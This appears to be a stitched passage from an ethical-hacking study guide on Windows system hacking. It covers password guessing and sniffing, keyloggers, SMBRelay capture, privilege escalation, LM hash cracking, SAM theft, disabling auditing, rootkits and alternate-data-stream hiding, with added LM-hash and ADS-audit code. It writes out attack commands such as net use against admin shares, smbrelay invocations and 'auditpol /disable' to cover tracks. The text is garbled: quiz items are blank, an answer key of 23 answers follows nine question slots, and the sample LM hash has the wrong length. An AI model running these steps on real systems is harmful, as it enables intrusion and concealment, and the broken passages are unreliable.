programs let you receive and send custom SNMP traps, forward them to other destinations, log them,
and import them into command lines and environment variables.
Also, several Web-based free DNS Interrogation tools are available, such as:
www.zoneedit.com/lookup.html?ad=goto
www.infobear.com/nslookup.shtml
www.network-tools.com
Countermeasures
It's a good idea to be aware of common countermeasures to the vulnerabilities we've just discussed.
One reason is to be aware of how the target may be trying to keep the attacker out. A better reason is
to make sure your systems aren't as vulnerable.
There are many countermeasures to the various attack techniques listed above; some are more
effective than others. We'll list them in the same order we listed the attacks.
Assessment Questions
Answers to these questions can be found in Appendix A.
1. Which two modes does Windows employ to utilize protection ring layers?
   a. Kernel mode and real mode
   b. User mode and kernel mode
   c. User mode and protected mode
   d. User mode and privileged mode
2. Which Windows protection layer allows an attacker highest privilege access to the
   architecture?
   a. Real mode
   b. Protected mode
   c. Kernel mode
   d. User mode
3.
4.
5.
6. Which choice is not information a hacker could commonly get from exploiting a successful
   null session?
   a. List of users and groups
   b. List of access modes
   c. List of machines
   d. List of shares
7.
8.
9.
1. Answer: b
2. Answer: c
3. Answer: a
4. Answer: c
   Although security accounts are stored in Active Directory, SAM is retained on Windows 2000
   domain controllers for compatibility with those domains and applications that depend on it.
5. Answer: a
6. Answer: b
7. Answer: d
8. Answer: a
9. Answer: c
10. Answer: d
    Since the administrator account is the account with RID=500, it cannot be obscured successfully.
    Therefore, an attacker can find out which account is the administrator account, even if it has been
    renamed, by the RID=500.
11. Answer: b
12. Answer: a
13. Answer: b
14. Answer: c
15. Answer: d
16. Answer: a
17. Answer: d
18. Answer: b
19. Answer: d
20. Answer: c
21. Answer: b
22. Answer: a
23. Answer: d
    If a hacker obtains a copy of the entire DNS zone for a domain, it may contain a complete listing of
    all hosts in that domain. The hacker needs no special tools or access to obtain a complete DNS
    zone if the name server is promiscuous and allows anyone to do a zone transfer.
Password Guessing
Guessing passwords is one of the first steps to owning the box. While password guessing seems as
though it might be a fruitless task, it's often successful because most users like to employ
easy-to-remember passwords. Also, if any information about the user is available, like family names or
hobbies, you might have a clue to the password.
The most common passwords are password, root, administrator, admin, operator, demo, test,
webmaster, backup, guest, trial, member, private, beta, [company_name], and [known_username].
After finding that the NetBIOS TCP 139 port is open and accessible, a very effective method of
breaking into Windows is by guessing the password. A good place to start would be to create the IPC$
null session described in Chapter 6 or to attempt to connect to a default enumerated share like
Admin$, C$, or %Systemdrive% and try a username/password combination. Other accounts that are
good candidates for hacking are accounts that have never been used or logged in to or haven't had
the password changed in a while. Finally, shared accounts, like TEMP, are ripe targets.
Once an account is identified, the attacker can issue the NET USE command, like this:
net use * \\target_IP\share * /u:name
This will initiate a prompt for a password, such as:
c:\>net use * \\10.1.1.13\c$ * /u:rusty
Password Sniffing
Password sniffing is often a preferred tactic to guessing. It's a lot less work to sniff credentials off the
wire as users log in to a server than to guess them. Once sniffed, simply replay the passwords to gain
access. Since most network traffic is unencrypted, sniffing may yield a lot of info; however, it requires
that you have physical or logical access to the wire segment or resource.
L0phtcrack
L0phtcrack LC5 (http://sectools.org/tools2.html) is a password-auditing and recovery package that
includes an SMB packet capture feature. It listens to the local network segment and captures
individual login sessions and can capture most passwords if allowed to run for an extended period of
time.
L0phtcrack was produced by @stake after L0pht merged with @stake in 2000. @stake was acquired
by Symantec in 2004, but Symantec has since stopped selling this tool to new customers citing U.S.
government export regulations and has discontinued support.
KerbCrack
Another useful tool for sniffing passwords is KerbCrack (http://ntsecurity.nu/toolbox/kerbcrack/). If you
found port 88 active during the scanning phase, the target is likely using Kerberos to implement single
sign-on and to provide a secure means for mutual authentication.
Kerberos is a trusted, third-party authentication protocol developed under Project Athena at the
Massachusetts Institute of Technology (MIT). In Greek mythology, Kerberos is a three-headed dog
that guards the entrance to the underworld.
Using symmetric key cryptography, Kerberos authenticates clients to other entities on a network, of
which a client requires services. Centralized servers implement the Kerberos-trusted Key Distribution
Center (KDC), Kerberos Ticket Granting Service (TGS), and Kerberos Authentication Service (AS).
Windows 2000 provides Kerberos implementations.
Because a client's password is used in the initiation of the Kerberos request for the service protocol,
password guessing can be used to impersonate a client. KerbCrack consists of two programs:
kerbsniff and kerbcrack. The sniffer listens to the network on port 88 and captures Windows 2000 and
XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a brute
force attack or a dictionary attack.
Other network sniffers include:
Ethereal (www.ethereal.com/). Ethereal is a popular free network protocol analyzer for Unix and
Windows. It allows users to examine data from a live network or from a captured file on disk. It
can interactively browse the captured data, viewing summary and detail information for each
packet, and has several powerful features, including a rich display filter language and the ability
to view the reconstructed stream of a TCP session and to parse an 802.11 packet.
Snort (www.snort.org). Free lightweight IDS and general-purpose sniffer for various versions of
Linux, Unix, and Windows.
Alternate Means
Two other methods for getting passwords are dumpster diving and shoulder surfing. Dumpster diving
describes the acquisition of information that is discarded by an individual or organization. In many
cases, information found in trash can be very valuable to a hacker, and could lead to password clues.
Post-it notes are rarely shredded and often contain passwords and logons. Other discarded
information may include technical manuals, password lists, telephone numbers, and organization
charts.
Shoulder surfing is the oldest, lowest-tech way to troll for passwords. It's simply standing behind
someone and watching them type their password, then trying to duplicate the keystrokes later. It's a
commonly used way to gain entry to button-coded doors and can still be used if the attacker has
physical access to the target machine, most likely a co-worker's. It's obviously not an option for
remote password guessing.
Keystroke Loggers
If all other attempts to sniff out domain privileges fail, then a keystroke logger might be the solution.
Keystroke loggers (or keyloggers) intercept the target's keystrokes and either save them in a file to be
read later, or transmit them to a predetermined destination accessible to the hacker.
There are two types of keystroke loggers: either hardware devices or software programs. They record
every key typed on a computer, sending this information to the person who installed it or saving it to
be read later. While hardware keystroke loggers require physical access to a system, they are not
detectable by anti-spyware software.
The software versions may be delivered by Trojan horse email attachments or installed directly to the
PC. The hardware version must be physically installed on the target machine, usually without the
user's knowledge. Although keyloggers are sometimes used in the payloads of viruses, they are more
commonly delivered by a Trojan-horse program or remote administration Trojan (RAT).
Since keylogging programs record every keystroke typed in via the keyboard, they can capture a wide
variety of confidential information, including passwords, credit card numbers, private email
correspondence, names, addresses, and phone numbers. Once installed on the target machine,
either directly by the user, or through stealthier means, the keylogger program runs continually in the
background. After the keystrokes are logged, they can be hidden in the machine for later retrieval or
transmitted to the attacker via the Internet. For example, sometimes these logging files are emailed to
the person who planted the logging software. On PCs accessed by the public in areas such as copy
shops, cyber cafes, and university computer labs, the spy simply accesses the log file from the
compromised machine at a later date.
The attacker then examines the reports for passwords or for information that can be used to
compromise the system or to engineer an attack. A keylogger may reveal the contents of email
composed by the victim.
Some rare keyloggers include routines that secretly turn on video or audio recorders, and transmit
what they capture over an Internet connection. Other products such as Spector and PCSpy capture
screens rather than keystrokes. Most criminal keyloggers pay attention to keystrokes, hoping to steal
bank account numbers or other financial data.
As an example, look at everything one commercial software keylogger, ISpyNow, claims it can do:
Logs websites accessed: Logs all websites visited
Monitors keystrokes: Records all keystrokes, including hidden system keys
Logs windows: Records information on which windows have been opened
Logs applications: Logs every application executed
Logs IM chats: Records both ends of AIM/AOL/MSN/ICQ instant messaging in real time
Copies clipboard activity: Records all text and images cut and pasted to the clipboard
Hardware Keyloggers
Some hardware keystroke loggers consist of a small AA battery-sized plug that connects between the
victim's keyboard and computer. The device collects each keystroke as it is typed and saves it as a
text file on its own tiny hard drive. Later, the keystroke logger owner returns, removes the device, and
downloads and reads the keystroke information. These devices have memory capacities between
8KB and 2MB, which, according to manufacturers' claims, is enough memory to capture a year's
worth of typing.
Manufacturers now offer hardware keyloggers that are complete keyboards with hardware keyloggers
built-in. For example, KeyGhost, a New Zealand company, offers a keyboard with the logging
hardware built into the case. They claim to have a variety of bugged keyboards ready-made to match
many brands of computers. If your existing keyboard is unique, KeyGhost will modify it and return it
with the keylogger hardware hidden inside.
Software Keyloggers
A software keystroke logger program does not require physical access to the user's computer. It can
be installed intentionally by someone who wants to monitor activity on a particular computer or
downloaded unwittingly as spyware and executed as part of a rootkit or a Remote Access Trojan
(RAT).
The software keylogger normally consists of two files: a DLL that does all the recording and an EXE
that installs the DLL and sets the activation trigger. The two files must be present in the same
directory. Then the keystroke logger program records each keystroke the user types and uploads the
information over the Internet periodically to the installer.
Software keyloggers are often delivered via a Trojan payload through email. This area of malicious
code is growing exponentially as well-financed criminal groups find holes in financial networks. One
advantage software keyloggers have over hardware keyloggers is that the program can often remain
undetected and be continually initiated every time the computer is turned on. Also, software
keyloggers are cheaper than hardware keyloggers, with many free versions on the Internet.
Many software keystroke loggers are integrated with other surreptitious recording software, such as
screen capture software, remote control software, or audio and video recorders.
Keylogging Tools
There are a lot of software keyloggers out there, and several of them are free. Although not technically
keyloggers, products like Spector (www.spector.com) automatically take hundreds of screen shots
every hour. Spector works by taking a snapshot of whatever is on the target's computer screen and
storing it in a hidden location on the target's hard drive, to be retrieved later.
Another tool, eBlaster (www.eblaster.com), records the target's computer activity such as email, chat,
instant messages, websites visited, and keystrokes typed, and then sends this recorded information to
the attacker's email address. It sends duplicate copies of email to the attacker, within seconds of the
target's sending or receiving an email.
Other software keyloggers include:
ISpyNow. www.ispynow.com
KeyCaptor. www.keylogger-software.com
Redirecting SMB
Eavesdropping on passwords becomes much easier if the attacker can trick the victim into attempting
Windows authentication of the attacker's choice and redirect the SMB logon to the attacker.
Simply stated, this is done by sending an email message to the victim containing an embedded
hyperlink to a fraudulent SMB server. When the hyperlink is clicked, the user unwittingly sends his or
her credentials over the network.
A tool that can implement this kind of password trap is SMBRelay
(http://seclists.org/pentest/2002/Jul/0006.html). SMBRelay is a server that can capture usernames
and password hashes from incoming SMB traffic. Another version, SMBRelay2, works at the NetBIOS
level across any protocol to which NetBIOS is bound (such as NetBEUI or TCP/IP). It differs from
SMBRelay in that it uses NetBIOS names rather than IP addresses. Like SMBRelay, SMBRelay2 also
supports man-in-the-middle attacks to a third host.
To use SMBRelay:
1. Disable NetBIOS over TCP/IP, and block ports 139 and 445.
2. Start the SMBRelay server, and listen for SMB packets:
   c:\>smbrelay /e
   c:\>smbrelay /IL 2 /IR 2
An attacker can then access the client machine simply by connecting to it via a relay address using
c:\> net use * \\<capture_ip>\c$.
To execute an SMBRelay man-in-the-middle attack, the attacker builds a server at address
192.168.234.251, a relay address of 192.168.234.252 using /R, and a target server address of
192.168.234.34 with /T.
Then he or she executes: c:\> smbrelay /IL 2 /IR /R 192.168.234.252 /T 192.168.234.34.
When a victim client connects to the fraudulent server thinking it is talking to the intended server, the
attacker's server intercepts the call, hashes the password, and passes the connection to the target
server.
Privilege Escalation
Very often, the attacker will not be able to snag the Administrator account and password, and will have
to settle for access to the network using a non-admin user account, like Guest. This means that the
next step the attacker will probably take is to try to elevate his or her network privilege to that of an
administrator, to gain full control of the system. This is called privilege escalation.
This is not easy, as privilege escalation tools must usually be executed physically from a target
machine on the network, although some of the tools listed in this section allow remote privilege
escalation. Most often, these tools require the hacker to have access to that machine or server.
One big problem with privilege escalation tools is that the operating systems are continually patched
to prevent these tools from working. This means the attacker will need to know the OS of the system
on which he or she is trying to install the tool, and he or she will need to have a variety of tools to
match to the OS.
For example, GetAdmin.exe (www.nmrc.org/pub/faq/hackfaq/hackfaq-15.html) is a small program
that adds a user to the local administrators group. It uses a low-level NT kernel routine to set an
NTglobalflag attribute, allowing access to any running process. To use GetAdmin, the attacker
must log on to the server console to execute the program, as it's run from the command line or from a
browser and works only with NT 4.0 Service Pack 3.
Another NT tool, hk.exe (http://seclists.org/pen-test/2001/Mar/0209.html), exposes a Local
Procedure Call flaw in NT, allowing a non-admin user to be escalated to the administrators group.
Hk.exe works on IIS 5.0.
Table 7-1 shows some privilege escalation tools and the operating systems on which they'll work.
TOOL                                                                      OS
pipeupadmin (www.bitenova.nl/tt/dgap4)                                    Windows 2000
billybastard (www.packetstormsecurity.org/filedesc/billybastard.c.html)
getad (http://packet-x.net/tools_exploits/getad)                          Windows XP
Password Cracking
Passwords are generally stored and transmitted in an encrypted form called a hash. When a user logs
on to a system and enters a password, a hash is generated and compared to a stored hash. If the
entered and the stored hashes match, the user is authenticated.
Prior to Windows NT 4.0 SP4, Windows NT supported two kinds of challenge/response
authentication, LanManager (LM) challenge/response, and Windows NT challenge/response (also
known as NTLM challenge/response). Versions of Windows prior to Windows 2000 use LM password
hashes, which have several weaknesses:
LM is not case sensitive: All alphabetic characters are converted to uppercase. This effectively
reduces the number of different combinations a password cracker has to try.
All LM passwords are stored as two 7-character hashes. Passwords that are exactly 14
characters long will be split into two 7-character hashes. Passwords with fewer than 14
characters will be padded up to 14 characters.
Owing to the mathematics of password cracking, two 7-character hashes are significantly easier to
crack than one 14-character hash. To see why this is, let's step through an example. Let's use the
password 123456qwerty:
1. When this password is encrypted with LM algorithm, it is first converted to all uppercase:
123456QWERTY.
2. The password is padded with null (blank) characters to make it 14-character length:
123456QWERTY__.
3. Before encrypting this password, the 14-character string is split into halves: 123456Q and
WERTY__.
4. Each string is individually encrypted, and the results are concatenated:
123456Q = 6BF11E04AFAB197F
WERTY__ = F1E9FFDCC75575B15
5. The resulting hash is 6BF11E04AFAB197FF1E9FFDCC75575B15.
The first half of the hash contains alphanumeric characters and could take L0phtcrack several
hours to crack, but the second half will take only about 60 seconds.
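To see the split in code, here is an added Go implementation of the LM preprocessing and hash (not from the book; it uses the standard library's crypto/des and assumes ASCII passwords, whereas real LM uses the OEM code page), plus an audit check that reads the "seven characters or fewer" weakness straight off a stored hash, since a half that was padded to nothing always hashes to the same constant.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// lmMagic is the fixed 8-byte plaintext LM encrypts with each password half as the DES key.
var lmMagic = []byte("KGS!@#$%")

// emptyHalf is DES(lmMagic) under the all-zero key: the hash of an empty or fully padded half.
const emptyHalf = "AAD3B435B51404EE"

// desKeyFrom7 spreads 7 password bytes over 8 DES key bytes (7 key bits per byte,
// parity position lowest; crypto/des ignores the parity bit).
func desKeyFrom7(k []byte) []byte {
	out := []byte{
		k[0] >> 1,
		(k[0]&0x01)<<6 | k[1]>>2,
		(k[1]&0x03)<<5 | k[2]>>3,
		(k[2]&0x07)<<4 | k[3]>>4,
		(k[3]&0x0F)<<3 | k[4]>>5,
		(k[4]&0x1F)<<2 | k[5]>>6,
		(k[5]&0x3F)<<1 | k[6]>>7,
		k[6] & 0x7F,
	}
	for i := range out {
		out[i] <<= 1
	}
	return out
}

// LMHalves applies the LM preprocessing from the text: upper-case (ASCII assumed),
// cut to 14 bytes, pad with NUL bytes, split into two 7-byte halves.
func LMHalves(password string) (string, string) {
	buf := make([]byte, 14)
	copy(buf, strings.ToUpper(password))
	return string(buf[:7]), string(buf[7:])
}

// lmHalf hashes one 7-byte half: DES-encrypt lmMagic with the half as the key.
func lmHalf(half string) string {
	c, err := des.NewCipher(desKeyFrom7([]byte(half)))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, lmMagic)
	return strings.ToUpper(hex.EncodeToString(out))
}

// LMHash returns the 32-hex-digit LM hash; the two halves are hashed independently,
// which is exactly why each can be cracked on its own.
func LMHash(password string) string {
	a, b := LMHalves(password)
	return lmHalf(a) + lmHalf(b)
}

// AuditLMHash reports what an auditor can read off a stored LM hash before any cracking.
func AuditLMHash(h string) string {
	h = strings.ToUpper(h)
	switch {
	case h == emptyHalf+emptyHalf:
		return "empty password, or LM hash storage has been disabled"
	case strings.HasSuffix(h, emptyHalf):
		return "password is 7 characters or fewer: the second half is the empty-half constant"
	}
	return "8 to 14 characters; each 7-character half can still be attacked on its own"
}

func main() {
	// The text's example password, walked through the same steps.
	a, b := LMHalves("123456qwerty")
	fmt.Printf("halves: %q %q\n", a, b)
	h := LMHash("123456qwerty")
	fmt.Println("LM hash:", h)
	fmt.Println("second half equals LM half of \"werty\":", h[16:] == LMHash("werty")[:16])
	fmt.Println(AuditLMHash(h))
	fmt.Println(AuditLMHash(LMHash("abc")))
}
```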
In contrast, NTLM authentication takes advantage of all 14 characters in the password and allows
lowercase letters. Thus, even though an attacker eavesdropping on the Windows NT authentication
protocol can attack it in the same way as the LM authentication protocol, it will take far longer for the
attack to succeed. If the password is strong enough, it will take a single 200 MHz Pentium Pro
computer an average of 2,200 years to find the keys derived from it and 5,500 years to find the
password itself (or 2.2 years and 5.5 years with 1,000 such computers and so forth).
The LM hash has since been replaced by WinNT Challenge/Response NTLMv2. For NTLMv2, the key
space for password-derived keys is 128 bits. This makes a brute force search infeasible, even with
hardware accelerators, if the password is strong enough.
If both client and server are using SP4, the enhanced NTLMv2 session security is negotiated. It
provides separate keys for message integrity and confidentiality and client input into the challenge to
prevent chosen plain text attacks and makes use of the HMAC-MD5 algorithm for message integrity
checking.
In Windows 2000 Service Pack 2 and in later versions of Windows, a setting is available that lets a
user prevent Windows from storing a LAN Manager hash of the password.
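As an added example (Python written for this guide, not code from the book or from any tool it names), the pre-hash steps of the walkthrough above are coded as a function, and the same split is used to audit a pwdump-style hash dump: hashing a half made of seven NUL bytes always gives the well-known constant AAD3B435B51404EE, so a second half equal to it shows a password of at most seven characters, and two such halves show either a blank password or that the LM-storage setting just described has taken effect. The user:rid:LM:NT::: line format and all sample values are constructed.

```python
from typing import Dict, List, Tuple

# The LM hash of a 7-byte half consisting only of NUL bytes is always this
# value (a well-known constant of the LM algorithm; it is not on this page).
# A password of at most seven characters therefore carries it as the second
# half of its hash, and a hash made of two such halves means either a blank
# password or that LM hashes are no longer being stored.
EMPTY_HALF = "AAD3B435B51404EE"


def lm_preprocess(password: str) -> Tuple[bytes, bytes]:
    """Steps 1 to 3 of the walkthrough: uppercase, NUL-pad to 14 bytes, split.
    LM also discards anything beyond 14 characters (true of the algorithm,
    not stated in the text). Only ASCII is handled; LM uses the OEM code page."""
    padded = password.upper().encode("ascii")[:14].ljust(14, b"\x00")
    return padded[:7], padded[7:]


def audit_lm_hash(dump_line: str) -> Dict[str, object]:
    """Classify one pwdump-style line (user:rid:LM:NT:::, an assumed format)."""
    fields = dump_line.strip().split(":")
    if len(fields) < 4:
        raise ValueError("expected user:rid:LM:NT")
    user, lm = fields[0], fields[2].upper()
    if len(lm) != 32:
        raise ValueError(f"{user}: LM field must be 32 hex digits")
    first, second = lm[:16], lm[16:]
    if first == EMPTY_HALF and second == EMPTY_HALF:
        return {"user": user, "lm_stored": False, "max_length": None,
                "note": "blank password, or LM hash storage is disabled"}
    if second == EMPTY_HALF:
        return {"user": user, "lm_stored": True, "max_length": 7,
                "note": "second half empty: password is at most 7 characters"}
    return {"user": user, "lm_stored": True, "max_length": 14,
            "note": "two non-empty halves; each half is attacked independently"}


def audit_dump(lines: List[str]) -> List[Dict[str, object]]:
    """Audit every non-blank line of a dump."""
    return [audit_lm_hash(line) for line in lines if line.strip()]


# Constructed sample dump. alice's LM value pairs the first half quoted in
# the text (123456Q) with the empty second half; bob's shows the disabled or
# blank form; carol's has two made-up non-empty halves. NT hashes are
# placeholders and RIDs are arbitrary.
SAMPLE_DUMP = [
    "alice:1001:6BF11E04AFAB197FAAD3B435B51404EE:0123456789ABCDEF0123456789ABCDEF:::",
    "bob:1002:AAD3B435B51404EEAAD3B435B51404EE:FEDCBA9876543210FEDCBA9876543210:::",
    "carol:1003:6BF11E04AFAB197F0123456789ABCDEF:00112233445566778899AABBCCDDEEFF:::",
]

if __name__ == "__main__":
    print(lm_preprocess("123456qwerty"))
    for finding in audit_dump(SAMPLE_DUMP):
        print(finding)
```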
Dictionary Attack
The fastest method for generating hashes is a dictionary attack, which uses all words in a dictionary
or text file. There are many dictionaries available on the Internet that cover most major and minor
languages, names, popular television shows, and so on. Any dictionary word is a weak password and
can be cracked quickly.
Most cracking tools will include their own dictionaries with the utility or suggest links to find
dictionaries to build your own. A specific example of this approach is the LC5 password auditing and
recovery tool, which performs the encrypted file comparison against a dictionary of over 250,000
possible passwords.
Hybrid Attack
Another method of cracking is called a hybrid attack, which builds on the dictionary method by adding
numeric and symbolic characters to dictionary words.
Depending on the password cracker being used, this type of attack will try a number of variations. The
attack tries common substitutes of characters and numbers for letters (e.g., p@ssword and h4ckme).
Some will also try adding characters and numbers to the beginning and end of dictionary words (for
example, password99, password$%, and so on).
Rainbow Attack
A new password attack method is called the rainbow crack technique. It trades off the time-consuming
process of creating all possible password hashes by building a table of hashes in advance of the
actual crack. After this process is finished, the table, called a rainbow table, is used to crack the
password, which will then normally only take a few seconds.
Stealing SAM
The SAM file in Windows NT/2000 contains the usernames and encrypted passwords in their hash
form; therefore accessing the SAM will give the attacker potential access to all of the passwords. The
SAM file can be obtained from the %systemroot%\system32\config directory, but the file is
locked when the OS is running, so the attacker will need to boot the server to an alternate OS.
This can be done with NTFSDOS (www.sysinternals.com), which will mount any NTFS partition as a
logical drive. LinNT.zip (www.nttoolbox.com/public/tools/LinNT.zip) is another good utility. It makes
a Linux boot disk that allows the user to reset the administrator password. The site is no longer up,
and copies of LinNT.zip are not that easy to find.
Another way to get the SAM is to copy it from either the server's repair directory or the physical ERDisk
itself. Whenever rdisk /s is run, a compressed copy of the SAM called SAM._ is created in
%systemroot%\repair. Expand this file using c:\> expand sam._ sam.
Starting with WinNT SP3, Microsoft added a second layer of 128-bit encryption to the password hash
called SYSKEY. Newer versions of Windows place a backup copy in
C:\winnt\repair\regnabk\sam and employ SYSKEY to make the cracking harder.
Cracking Tools
Once the hashes have been extracted from the SAM, an automated password cracker like
L0phtCrack LC5 can crack them. As mentioned earlier, the password sniffing program L0phtCrack is also
one of the best tools to crack Windows passwords from hashes.
L0phtCrack uses numerous methods for generating password guesses, including dictionary, hybrid,
and brute force. LC5 was discontinued by Symantec in 2006, but you can still find the LC5 installer
(http://download.insecure.org/stf/lc5-setup.exe) on the Internet.
For obtaining hashes, L0phtCrack contains features that allow it to capture passwords as they
traverse the network, copy them out of the Windows Registry, and retrieve them from Windows
emergency repair disks.
When hashes are obtained, L0phtCrack first performs a dictionary attack. The dictionary used by
L0phtCrack is selected by the user; the included dictionary may be used, although more
comprehensive dictionaries are available on the Internet.
L0phtCrack hashes each word in the list and compares that hash to the hashes to be cracked. If the
compared hashes match, L0phtCrack has found the password. After L0phtCrack completes the
dictionary attack, it iterates through the word list again using a hybrid attack.
Finally, L0phtCrack resorts to a brute force attack to crack any remaining hashes, trying every
possible combination of characters in a set. The set of characters used by L0phtCrack in a brute force
attack can be controlled by the user. The larger the set selected, the longer the crack will take.
Another popular password cracker is John the Ripper (www.openwall.com/john/). John the Ripper is a
free, fast password cracker currently available for Unix, DOS, Win32, and BeOS. Its primary purpose
is to detect weak Unix passwords, but a number of other hash types are supported as well. One
problem with John the Ripper is that it can't differentiate between uppercase and lowercase
passwords.
Nwpcrack (ftp.cerias.purdue.edu/pub/tools/novell/) is a free password cracking utility for Novell
Netware. IMP (www.wastelands.gen.nz) is another free NetWare password cracking utility, this time
with a GUI. Some other common password cracking tools are:
Brutus. Brutus (www.hoobie.net/brutus/) is a password cracking tool that can perform both
dictionary attacks and brute force attacks where passwords are randomly generated from a given
character set. Brutus can crack multiple authentication types: HTTP (Basic authentication, HTML
Form/CGI), POP3, FTP, SMB, and Telnet.
Two cracking tools that use Rainbow Tables are Ophcrack (http://ophcrack.sourceforge.net) and
RainbowCrack (www.antsight.com/zsl/rainbowcrack/).
Covering Tracks
Even though the attacker has compromised the system, he or she isn't finished. He/she must disable
logging, clear log files, eliminate evidence, plant additional tools, and cover his or her tracks.
Once a hacker has successfully gained Administrator access to a system, he or she will try to remove
signs of his or her presence. The evidence of having been there and done the damage must be
eliminated. When all incriminating evidence has been removed from the target, he or she will install
several back doors to permit easy access at another time.
Disabling Auditing
The first thing a hacker will do after gaining Administrator privileges is disable auditing. The WinNT
Resource Kit's auditpol.exe tool (http://support.microsoft.com/kb/921469) can disable auditing from
the command line:
c:\> auditpol \\10.1.1.13 /disable
(0) Audit Disabled
After compromising the system, the last thing a hacker will do is turn auditing on again using auditpol:
c:\> auditpol \\10.1.1.13 /enable
Auditing enabled successfully.
Planting Rootkits
Before the attacker leaves the system, he or she wants to make sure he or she can have access to
the box later. One way to do this and cover his or her tracks at the same time is to install a rootkit on
the compromised system.
A rootkit is a collection of software tools that a cracker uses to obtain administrator-level access to a
computer or computer network. The intruder installs a rootkit on a computer after first obtaining user-level
access, either by exploiting a known vulnerability or cracking a password. The rootkit then
collects user IDs and passwords to other machines on the network, thus giving the hacker root or
privileged access.
The rootkit NTrootkit consists of utilities that also monitor traffic and keystrokes, create a backdoor
into the system for the hacker's use, alter log files, attack other machines on the network, and alter
existing system tools to circumvent detection.
NTrootkit can also:
Hide processes (that is, keep them from being listed)
Hide files
Hide registry entries
Intercept keystrokes typed at the system console
Issue a debug interrupt, causing a blue screen of death
Redirect EXE files
File Hiding
Attackers use different methods to hide files on compromised servers. There are two ways of hiding
files in Windows NT and Windows 2000:
Use the attrib command: attrib +h [file/directory]
Use NTFS Alternate Data Streaming (ADS)
The NTFS file system used by Windows NT, 2000, and XP has a feature called Alternate Data
Streams (ADS) that was originally developed to provide compatibility with non-Windows file systems,
like Macintosh Hierarchical File System (HFS); but ADS can also allow data to be stored in hidden
files that are linked to a regular visible file. These streams are not limited in size, and there can be
more than one stream linked to the visible file. This allows an attacker to hide his or her tools on the
compromised system and retrieve them later.
To see how creating an alternate data stream works:
1. From the command line, type Notepad temp.txt.
2. Put some data in the temp.txt file; save the file, and close Notepad.
3. From the command line, type dir temp.txt, and note the file size.
4. Go to the command line, and type Notepad temp.txt:hidden.txt.
5. Type some text into Notepad; save the file, and close it.
6. Check the file size again, and notice that it hasn't changed.
7. If you open temp.txt, you see your original data and nothing else.
8. If you use the type command on the filename from the command line, you still get the original
data.
9. If you go to the command line and type type temp.txt:hidden.txt, you get an error.
Some third-party tools are available to create Alternate Data Streams. The ADS creation and
detection tool makestrm.exe moves the physical contents of a file to its stream. The utility ads_cat
from Packet Storm is a utility for writing ADS that includes ads_extract, ads_cp, and ads_rm,
utilities to read, copy, and remove data from NTFS alternate file streams.
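As an added defender-side example (Python written for this guide, not from the book or from any of the tools above), this parses a saved dir /r listing, which on Windows Vista and later prints each file's alternate streams beneath it, and reports every stream other than the Zone.Identifier stream Windows itself attaches to downloads. It also shows the effect noted in step 6: the visible size of temp.txt is unchanged while its hidden stream carries more bytes. The listing, names and sizes are constructed.

```python
import re
from typing import Dict, List

# Constructed sample of "dir /r" output. The /r switch lists alternate data
# streams; it exists from Windows Vista onward, not on the NT/2000/XP
# releases the walkthrough uses. Sizes mirror the walkthrough: temp.txt shows
# 12 bytes while temp.txt:hidden.txt holds 27 more.
SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Volume Serial Number is 1234-ABCD

 Directory of C:\\temp

03/01/2024  10:00 AM    <DIR>          .
03/01/2024  10:00 AM    <DIR>          ..
03/01/2024  10:02 AM                12 temp.txt
                                    27 temp.txt:hidden.txt:$DATA
03/01/2024  10:05 AM             4,096 notes.doc
                                    26 notes.doc:Zone.Identifier:$DATA
03/01/2024  10:07 AM               512 readme.txt
                                73,216 readme.txt:tool.exe:$DATA
               3 File(s)          4,620 bytes
"""

# A normal file line: date, time, AM/PM, size, name.
FILE_RE = re.compile(r"^\S+\s+\S+\s+[AP]M\s+([\d,]+)\s+(.+?)\s*$")
# A stream line is indented and ends in file:stream:$DATA.
STREAM_RE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:]+):\$DATA\s*$")

# Streams Windows itself attaches (mark-of-the-web on downloaded files);
# not evidence of hiding on their own.
BENIGN_STREAMS = {"Zone.Identifier"}


def _size(text: str) -> int:
    return int(text.replace(",", ""))


def parse_dir_r(output: str) -> Dict[str, dict]:
    """Map each file name to its visible size and its named $DATA streams."""
    files: Dict[str, dict] = {}
    for line in output.splitlines():
        m = STREAM_RE.match(line)
        if m:
            size, name, stream = m.groups()
            entry = files.setdefault(name, {"size": 0, "streams": {}})
            entry["streams"][stream] = _size(size)
            continue
        m = FILE_RE.match(line)
        if m:
            size, name = m.groups()
            files.setdefault(name, {"size": 0, "streams": {}})["size"] = _size(size)
    return files


def find_hidden_streams(files: Dict[str, dict]) -> List[dict]:
    """Report every non-benign stream, largest hidden payload first."""
    findings = [
        {"file": name, "stream": stream, "stream_bytes": size,
         "visible_bytes": info["size"]}
        for name, info in files.items()
        for stream, size in info["streams"].items()
        if stream not in BENIGN_STREAMS
    ]
    return sorted(findings, key=lambda f: -f["stream_bytes"])


if __name__ == "__main__":
    for f in find_hidden_streams(parse_dir_r(SAMPLE_DIR_R)):
        print(f"{f['file']} shows {f['visible_bytes']} bytes, but stream "
              f"{f['stream']} carries {f['stream_bytes']} bytes")
```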
Countermeasures
It's important to know what countermeasures exist for the tools we've listed, because you don't want
your system to be vulnerable. Here's a quick list of some countermeasures to take to prevent and
remediate the attacks already discussed.
Password guessing and cracking countermeasures include the following:
Enforce 7-12 character alphanumeric, upper- and lowercase passwords.
Set the password change policy to 30 days.
Physically isolate and protect the server.
Use the SYSKEY utility to store hashes on disk.
Monitor the server logs for brute force attacks on user accounts.
Block access to TCP and UDP ports 135-139.
Disable bindings to the WINS client on any adapter.
Log failed logon attempts in Event Viewer.
There are several steps to prevent or find Alternate Data Streams on your system. To remove ADS
manually, copy the front file to a FAT partition; then, copy it back to NTFS. Streams are lost when the
file is moved to FAT Partition.
Employ file integrity checkers to look for ADS and rootkits. Some tools include:
Tripwire (www.tripwiresecurity.com/). This monitors file changes, verifies integrity, and notifies
the administrator of any violations of data on network hosts.
Assessment Questions
Answers to these questions can be found in Appendix A.
1. Which choice below is not an activity during the System Hacking Phase?
a. Crack password hashes
b. Look up the URL in ARIN
c. Erase any traces of the hack
d. Escalate the level of permission
2.
3. What is a good clue that the target system is using NetBIOS naming?
a. TCP 139 port is open and accessible
b. TCP 193 port is open and accessible
c. UDP 193 port is open and accessible
d. Accounts that have never been used
4. What is the proper NET USE syntax to prompt NetBIOS to ask for a password?
